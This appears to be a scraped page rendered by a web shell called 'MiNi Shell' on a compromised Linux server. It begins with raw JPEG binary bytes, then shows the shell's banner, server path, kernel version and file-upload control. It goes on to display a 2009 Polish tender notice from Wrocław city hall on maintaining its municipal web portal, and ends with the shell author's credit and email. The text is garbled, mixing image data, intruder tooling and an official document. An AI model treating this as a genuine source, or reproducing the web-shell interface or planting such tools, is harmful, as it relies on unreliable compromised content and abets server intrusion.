JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/54017-N-2009.html

<p class="kh_header"><b>Wrocław: Utrzymanie i rozwój Wrocławskiego Portalu Internetowego</b><br>
<b>Numer ogłoszenia: 54017 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wrocław Urząd Miejski Wrocławia , pl. Nowy Targ 1/8, 50-141 Wrocław, woj. dolnośląskie, tel. 071 7779230, 7779231, faks 071 7779229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i rozwój Wrocławskiego Portalu Internetowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Ogólne warunki dotyczące przedmiotu zamówienia oraz wymagania co do sposobu jego realizacji

1) Przedmiotem niniejszego zamówienia jest:
a)	Objęcie 24 miesięczną opieką serwisową oprogramowania komputerowego zwanego dalej Systemem, zainstalowanego w jednostce organizacyjnej Zamawiającego, 
w szczególności: 
- Gotowość i usuwanie  Problemów w Systemie. 
- Konsultacje dotyczące architektury Systemu. 
Szczegółową definicję Systemu zawiera punkt C opisu przedmiotu zamówienia. Szczegółową definicję Problemu zawiera projekt umowy stanowiący załącznik do SIWZ.
b)	Rozwój aplikacji oraz funkcjonalności portalowych: 
- Tworzenie nowych funkcjonalności i aplikacji portalowych. 
- Konsultacje dotyczące oprogramowania Systemu. 
Szczegóły dotyczące planowanych funkcjonalności oraz kierunku rozwoju systemu zawiera punkt B opisu przedmiotu zamówienia. Szczegóły dotyczące zasad pracy przy rozwoju aplikacji oraz płatności zawiera projekt umowy stanowiący załącznik do SIWZ.
c)	Okresowe szkolenia dla użytkowników systemu zarządzania treścią i administratorów Systemu.
Szczegóły dotyczące szkoleń zawiera projekt umowy.
2)	Warunki dotyczące Gotowości, usuwania Problemów, konsultacji dotyczących Systemu.
a)	W przypadku stwierdzenia przez Zamawiającego błędu oprogramowania aplikacyjnego będącego częścią Systemu (tzn. nie spowodowanego przez Zamawiającego powtarzalnego działania oprogramowania, w tym samym miejscu programu, prowadzącego w każdym przypadku do otrzymania błędnych wyników jego działania) Wykonawca wykona i przekaże poprawki do oprogramowania aplikacyjnego.
b)	W ramach 24 miesięcznej opieki serwisowej Wykonawca przeprowadzi kwartalne wizyty serwisowe w terminach uzgodnionych przez Strony, przy udziale przedstawicieli Wykonawcy i Zamawiającego. Podstawowym celem kwartalnej wizyty serwisowej jest zaplanowanie prac na okres najbliższych trzech miesięcy.

Szczegóły dotyczące zasad klasyfikacji oraz trybu usuwania Problemów zawiera projekt umowy.

3)	Warunki dotyczące tworzenia nowych funkcjonalności, Zmian Systemu:
Wykonawca zobowiązany jest przedstawić szczegółową propozycję techniczno-cenową oraz harmonogram realizacji (cena w oparciu o stawkę za godzinę pracy specjalisty) w ciągu 5 dni roboczych od otrzymania od Zamawiającego prośby o złożenie ww. propozycji dla dokonania Zmiany Systemu. Wykonawca ponosi wszelkie koszty związane z przygotowaniem propozycji techniczno-cenowej.

Szczegóły dotyczące zasad współpracy w celu wprowadzenia Zmian Systemu zawiera projekt umowy.

4)	Warunki dotyczące realizacji zamówienia.
a)	Wykonanie całości przedmiotu umowy nastąpi w terminie 24 miesięcy od daty podpisania umowy.
b)	Wykonawca przenosi na rzecz Zamawiającego autorskie prawa majątkowe na polach eksploatacji dotyczące serwisowania oraz modyfikacji kodu będącego przedmiotem umowy. Prawa niniejsze przysługują Zamawiającemu od dnia odbioru na czas nieokreślony.
c)	Wykonawca zrealizuje System w postaci odkrytego kodu aplikacji (Open Source). Niedopuszczalne jest dostarczenie aplikacji z ukrytym projektem aplikacji lub bazującej na skompilowanych bibliotekach, których autorem jest Wykonawca do których kod nie będzie przekazany Zamawiającemu.
d)	Wykonawca ma prawo do dalszego wykorzystywania całości lub części wyników prac będących przedmiotem umowy.

Szczegółowe zasady realizacji przedmiotu umowy zawiera projekt umowy.

B.	Lista modyfikacji oraz nowych funkcjonalności planowanych w ramach zamówienia.
Zamawiający zastrzega sobie możliwość rozszerzenia zakresu zleconych prac o dodatkowe funkcjonalności nie wymienione w opisie przedmiotu zamówienia. 
Wszystkie prace będą realizowane na tych samych zasadach określonych w punkcie 3) działu A opisu przedmiotu zamówienia - Warunki dotyczące tworzenia nowych funkcjonalności, Zmian Systemu

1)	Migracja środowiska produkcyjnego.
-	Optymalizacja architektury systemu.
-	Przeniesienie środowiska produkcyjnego na nową maszynę.

2)	Rozwój mechanizmu autoryzacji użytkowników portalu.
-	Rozwój mechanizmu rejestracji użytkownika, oraz automatycznego zakładania konta pocztowego w systemie pocztowym którego dostawcą jest Google. Umożliwienie edycji profilu użytkownika. Uniemożliwienie automatycznego założenie konta użytkownika 
w portalu (CAPTCHA lub inny mechanizm wymagający interakcji użytkownika).
-	Rozwój mechanizmu pojedynczego logowania do wszystkich aplikacji w ramach portalu (w tym poczty google).
-	Rozwój mechanizmu prezentacji poczty w portalu.

3)	Modyfikacja rozszerzenie obecnie używanego WCM workflow.
-	Rozszerzenie workflow o stan akcję umożliwiającą autorowi przesłanie treści 
do akceptacji redakcji (PRZEŚLIJ DO ZATWIERDZENIA).
-	Rozszerzenie workflow o akcję umożliwiającą autorom samodzielne aktualizowanie opublikowanej już treści (UTWÓRZ KOPIĘ ROBOCZĄ).
-	Rozszerzenie workflow o akcję jednoczesnej publikacji w BIP i Portalu(PUBLIKUJ 
W BIP).
-	Rozszerzenie workflow o akcję umożliwiającą autorom samodzielne opublikowanie treści i automatyczne poinformowanie redaktora (PUBLIKUJ/INFORMUJ).
-	Rozszerzenie workflow o akcję umożliwiającą redaktorom oznaczenie przesłanie treści 
do tłumaczenia.
Ponadto dla zdefiniowanych grup autorów, przygotowanie: odrębnych bibliotek komponentów (dotyczy merytorycznie powiązanych ze sobą zasobów plikowych), dedykowanych szablonów wprowadzania treści, domyślnych uprawnień dla nowych komponentów.

4)	Optymalizacja wydajności systemu.
-	Optymalizacja ustawień CACHE serwera, portletów.
-	Optymalizacja wydajności WCM (czas odczytu, zapisu).

5)	Modyfikacja Systemu Identyfikacji Wizualnej Portalu.
-	Mechanizm zmiany wyglądu strony w zależności od daty godziny, oraz przygotowanie dodatkowych skór dla portletów.
-	Modyfikacja kompozycji w taki sposób aby możliwa była dynamiczna personalizacja wyglądu strony.

6)	Aplikacje portletowe.
-	Rozwój portletu polecamy tak aby umożliwiał prezentację polecanych wydarzeń kulturalnych wg kategorii taksonomicznych oraz umożliwiał priorytetyzowanie wydarzeń w ramach zbioru wydarzeń polecanych.
-	Rozwój mechanizmu umożliwiającego użytkownikowi zmianę przywrócenie domyślnego wyglądu strony.
-	Modyfikacja portletu content viewer, umożliwienie prezentowania obiektów flash 
w charakterze zajawki treści WCM i jako elementu treści.
-	Stworzenie mechanizmu (alerty kryzysowe) umożliwiającego uprawnionym użytkownikom prezentację treści alertu z pominięciem obiegu redakcyjnego. Portlet widoczny dla użytkowników tylko w okresie obowiązywania alertu.
-	Stworzenie portletu (chmura tagów) który dynamicznie zaprezentuje zalogowanemu użytkownikowi łącza do często odwiedzanych stron; wątki komentarzy w których użytkownik bierze udział; inne aktywności użytkownika.
-	Stworzenie mechanizmu umożliwiającego prezentację treści multimedialnych (video).

7)	Rozwój funkcjonalności społecznościowych.
-	Rozbudowa mechanizmu komentarzy, wątków komentarzy.
-	Frazy zabronione oparte na wyrażeniach regularnych.

8)	Mechanizm prezentowania treści innej niż WCM content.
-	Generowanie treści WCM z danych o ustalonej strukturze (XML, RSS);
-	Prezentowanie w portalu danych o ustalonej strukturze nie będących treścią WCM (bezpośrednio z relacyjnej bazy danych)

9)	Mechanizm umożliwiający zgłoszenie błędu na stronie.
Stworzenie mechanizmu umożliwiającego użytkownikowi generowanie zgłoszenia redakcyjnego administracyjnego w kontekście konkretnej treści WCM (lub innego elementu strony).

10)	Rozwój bazy wydarzeń kulturalnych.
-	Modyfikacja podziału na kategorie tematyczne.
-	Eksport wydarzeń do kalendarza google.

11)	Wprowadzanie treści.
-	Walidacja wprowadzonej treści pod kątem użycia niedozwolonych znaczników html, skryptów.
-	Opracowanie dedykowanego edytora treści (element szablonu wprowadzania treści WCM) o zdefiniowanej funkcjonalności.

12)	Mechanizm raportowania  pracy redaktorów i korespondentów.
-	Okresowe (dzienne, tygodniowe, miesięczne, zadany okres) raportowanie aktywności poszczególnych korespondentów (zdefiniowanych grup korespondentów)
-	Okresowe (dzienne, tygodniowe, miesięczne, zadany okres) raportowanie aktywności poszczególnych redaktorów (zdefiniowanych grup redaktorów)
-	Okresowe statystyki zmian zawartości poszczególnych obszarów serwisu, rodzaju zmian (nowa treść, aktualizacja treści), automatyzacje procedur weryfikacji aktualności treści.

13)	Mechanizm raportowania  aktywności użytkowników portalu.
-	Okresowe (dzienne, tygodniowe, miesięczne, zadany okres) raportowanie aktywności zarejestrowanych użytkowników portalu.
-	Statystyki odsłon treści portalowych.
-	Statystyki użytkowania aplikacji portalowych.

14)	Portal korporacyjny.
-  Rozwój QUIKR, SAMETIME, WEBMAIL
- Integracja zestawu aplikacji Domino będących elementem systemu pracy grupowej UMW. 


15)	Optymalizacja, rozwój mechanizmu wyszukiwania w portalu.
-	Rozwój mechanizmu wyszukiwania (obsługa fleksji języka polskiego, predefiniowane odpowiedzi na typowe zapytania).
-	Przeniesienie mechanizmu indeksowania kolekcji na odrębny serwer aplikacyjny (standardowa instalacja zawiera odrębną instancję WAS server1).

16)	Portal mobilny.
Stworzenie portalu wirtualnego przeznaczonego dla urządzeń mobilnych.

17)	Biuletyn Informacji Publicznej.
     Umożliwienie użytkownikowi dostępu do poprzednich wersji opublikowanej treści.

C.	Szczegółowa definicja Systemu.
Wrocławski Portal Internetowy powstał w oparciu o idee współodpowiedzialności za zawartość, podzielonej między redakcję i użytkowników. Uprawnieni użytkownicy mają możliwość personalizacji wyglądu portalu, tworzenia treści, komentowania, oceniania.

1)	Elementy Systemu.
W  skład Systemu wchodzą następujące elementy: Internetowy Portal Miejski (IPM), Wewnętrzny Portal Korporacyjny (WPK), System Zarządzania Zasobami Portalowymi (SZZP), Zbiór narzędzi agregujących (INTEGRATOR), System Identyfikacji Wizualnej Portalu (SIWP).
a)	Internetowy Portal Miejski (IPM). 
Serwis internetowy dla odbiorcy zewnętrznego, pełniący funkcję informacyjno-komunikacyjną. W skład Internetowego Portalu Miejskiego wchodzą:
-	polskojęzyczny portal internetowy (portal_pl)
-	biuletyn informacji publicznej (element portal_pl)
-	angielskojęzyczny portal internetowy (portal_en)
-	niemieckojęzyczny portal internetowy (portal_de)
-	francuskojęzyczny portal internetowy (portal_fr)
-	koreańskojęzyczny portal internetowy (portal_ko)
Ponadto, w obrębie portalu (dzięki funkcji pojedynczego logowania) użytkownik ma dostęp do wybranych usług z innych (zewnętrznych) systemów, również tych wymagających autoryzacji, bez konieczności ponownego logowania.

b)	Wewnętrzny Portal Korporacyjny (WPK). 
Jednolita platforma informacyjna, gromadząca i udostępniająca w jednym miejscu zasoby informacyjne Urzędu Miejskiego Wrocławia. Wewnętrzny Portal Korporacyjny daje użytkownikom zarejestrowanym w korporacyjnym katalogu użytkowników, zdalny dostęp 
do systemu pracy grupowej UM (SameTime, Quikr, poczta elektroniczna, aplikacje Domino).

c)	System Zarządzania Zasobami Portalowymi (SZZP). 
Zbiór aplikacji posiadających funkcjonalność systemu zarządzania zawartością stron portalowych, wykorzystujących zaawansowane mechanizmy portalu i Web Content Management (WCM). Redakcyjny przepływ treści jest budowany w taki sposób aby dać użytkownikom możliwość aktywnego uczestnictwa w tworzeniu portalu, ułatwić dzielenie się wiedzą (tak by w możliwie najprostszy i najszybszy sposób dało się udostępnić aktualizować wiele rozmaitych informacji), z zachowaniem zasad bezpieczeństwa.

d)  Zbiór narzędzi agregujących (INTEGRATOR). 
Prezentacja aplikacji i treści z innych (zewnętrznych) źródeł. Zastosowanie mechanizmów integrujących oraz obcinanie dokumentów WWW pozwala na zasilanie portalu danymi z innych (zewnętrznych) źródeł.

e)	System Identyfikacji Wizualnej Portalu (SIWP).
System identyfikacji wizualnej nawiązujący do System Identyfikacji Wizualnej Miasta.
2)	Platforma sprzętowa.
Wrocławski Portal Internetowy pracuje na platformie sprzętowej i systemowej wyspecyfikowanej poniżej i będącej w posiadaniu Zamawiającego.


Funkcja	OS	Serwer	Procesory	Pamięć RAM
IBM WebSphere Portal 6.0.1.4+ Wymagane aktualizacje	Red Hat Enterprise Linux AS release 4 (Nahant) 64b	HP DL 380 G5	2x Intel Xeon /3.16GHz	32 GB
Lotus Domino 7.02 + LDAP	Microsoft Windows Server 2003 Standard Edition PL SP1	ProLiant BL20p G3	2 x Intel Xeon  3.00GHz	4 GB
DB2 Universal Database v9.1.0.3, s070719,  MI00202,Fix Pack 3	Red Hat Enterprise Linux ES release 4 (Nahant Update 2)	ProLiant BL20p G3	2 x Intel Xeon  3.20GHz	4 GB
Quickr 8.0Tivoli Directory Server 6.1	Microsoft Windows Server 2003 Standard Edition PL SP1	ProLiant BL20p G3	2 x Intel Xeon  3.20GHz	4 GB
SameTime 7.5.1	Microsoft Windows Server 2003 Standard Edition PL SP1	ProLiant BL20p G3	1 x Intel Xeon  3.00GHz	1 GB
Serwer http Apache+ Edge Components	Red Hat Enterprise Linux ES release 4 (Nahant Update 2)	ProLiant BL20p G3	1 x Intel Xeon  3.00GHz	4 GB

Gwarancja. Na przedmiot zamówienia określony w § 2 ust. 1.pkt 2 projektu umowy Wykonawca udzieli Zamawiającemu 12 miesięcznej gwarancji liczonej od dnia wystawienia ostatniego protokołu odbioru. 

Pozostałe warunki realizacji zamówienia zawarte są w Projekcie umowy.

Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia, którą zamierza powierzyć podwykonawcom (art. 36 ust. 4 ustawy Pzp).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.23.00.00-6, 72.20.00.00-7, 72.21.20.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości:
5.000,00 zł (słownie złotych: pięć tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy, którzy:

1.	Spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych,

2.	Zrealizowali w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania                        o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jeden (1) raz, każdą z trzech niżej opisanych usług, polegających na wykonaniu:
a)	Zewnętrznego Portalu Internetowego w środowisku WebSphere;
b)	Wewnętzrnego Portalu Korporacyjnego w środowisku WebSphere i wdrożeniu go;
c)	Systemu zarządzania Treścią (CMS) w środowisku WebSphere wykorzystujący IBM Web Content Management.
    oraz udokumentują, że usługi te zostały wykonane należycie.

3.	Dysponują (lub będą dysponować) zespołem min. 4 osób, w skład którego wchodzą (wejdą):
      kierownik projektu spełniający poniższe wymagania:
a)	posiada certyfikat wydany przez niezależną instytucję potwierdzający znajomość metodyki zarządzania projektami (np. Prince2 Foundation),
b)	posiada doświadczenie zawodowe potwierdzone realizacją co najmniej 3 projektów informatycznych w roli kierownika projektu.
     oraz 
zespół programistów, co najmniej 3 osoby spełniające (każda z nich), poniższe  wymagania:
      posiada doświadczenie zawodowe potwierdzone udziałem w co najmniej trzech (3) projektach  informatycznych w roli programisty, z których co najmniej jeden (1) dotyczył realizacji usługi rozwoju wsparcia zewnętrznego portalu informacyjnego lub wewnętrznego portalu korporacyjnego, zgodnych 
z przedmiotem zamówienia. 
Sposób dokonywania oceny spełnienia warunków udziału w postępowaniu:
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełniania wymaganych warunków udziału w postępowaniu do Formularza oferty  Wykonawcy muszą dołączyć:

w formie oryginału:

1. oświadczenie z art. 22 ust. 1 ustawy Pzp,

w formie oryginału lub kserokopii poświadczonej ,,za zgodność z oryginałem przez Wykonawcę (§ 4.1. Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane), opatrzonej imienną pieczątką  i własnoręcznym podpisem:

2.	wykaz zrealizowanych z należytą starannością w ciągu ostatnich trzech lat (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed dniem wszczęcia postępowania o udzielenie zamówienia, co najmniej jeden (1) raz, każdej z trzech niżej opisanych usług polegających na wykonaniu:
c)	Zewnętrznego Portalu Internetowego w środowisku WebSphere;
d)	Wewnętrznego Portalu Korporacyjnego w środowisku WebSphere i wdrożeniu go;
e)	Systemu zarządzania Treścią (CMS) w środowisku WebSphere wykorzystujący IBM Web Content Management.
        z podaniem ich przedmiotu, dat wykonania i zamawiających,

Fakt należytego wykonania usług musi być potwierdzony odpowiednimi dokumentami dołączonymi do wykazu.


3.	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami o posiadanym przez nie doświadczeniu, zakresie wykonywanych przez nie czynności a także w przypadku kierownika projektu o posiadanych przez niego kwalifikacjach zawodowych,

4.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, o którym mowa powyżej (w punkcie 3) Wykonawca wskaże osoby, którymi będzie dysponował.

5.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy. Wykonawcy, którzy dokonali zmian w zakresie organów zarządzających, które nie są uwidocznione w dokumencie rejestrowym winni złożyć dokumenty potwierdzające powołanie nowych osób w skład organu zarządzającego (np. uchwała w sprawie powołania określonej osoby).

A) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
B) Dokument, o którym mowa w pkt A) powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt A), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia powyższego pkt B) stosuje się odpowiednio.
WYKONAWCY UBIEGAJĄCY SIĘ WSPÓLNIE O ZAMÓWIENIE:
a)	Dokument wymieniony w pkt. 5 musi być złożony odrębnie przez każdego 
z Wykonawców.
b)	Dokumenty wymienione w pkt  2, 3 i 4 mogą wykonawcy złożyć jako jeden wspólny dla wszystkich wykonawców ze wskazaniem w tzw. ,,uwagach (w przypadku wykazów), którego wykonawcy i w jakim zakresie ów dokument dotyczy,
Warunki dotyczące doświadczenia oraz potencjału osobowego badane będą łącznie.
c)	Oświadczenie wymienione w pkt. 1 wykonawcy składają wspólnie na jednym dokumencie (oświadczenie podpisane przez pełnomocnika lub każdego z wykonawców).
d)	 W Formularzu ofertowym w części dotyczącej wskazania Wykonawcy i dotyczących go danych (m.in. danych adresowych) - należy wpisać wszystkich Wykonawców i wszystkie dotyczące ich dane (m.in. dane adresowe).
e)	Do oferty musi być załączone - pełnomocnictwo do reprezentowania Wykonawców                  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu                       i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2009 godzina 10:00, miejsce: Urząd Miejski Wrocławia  
Wydział Zamówień Publicznych,
51-163 Wrocław
al. M. Kromera 44
pok. 339 (III piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com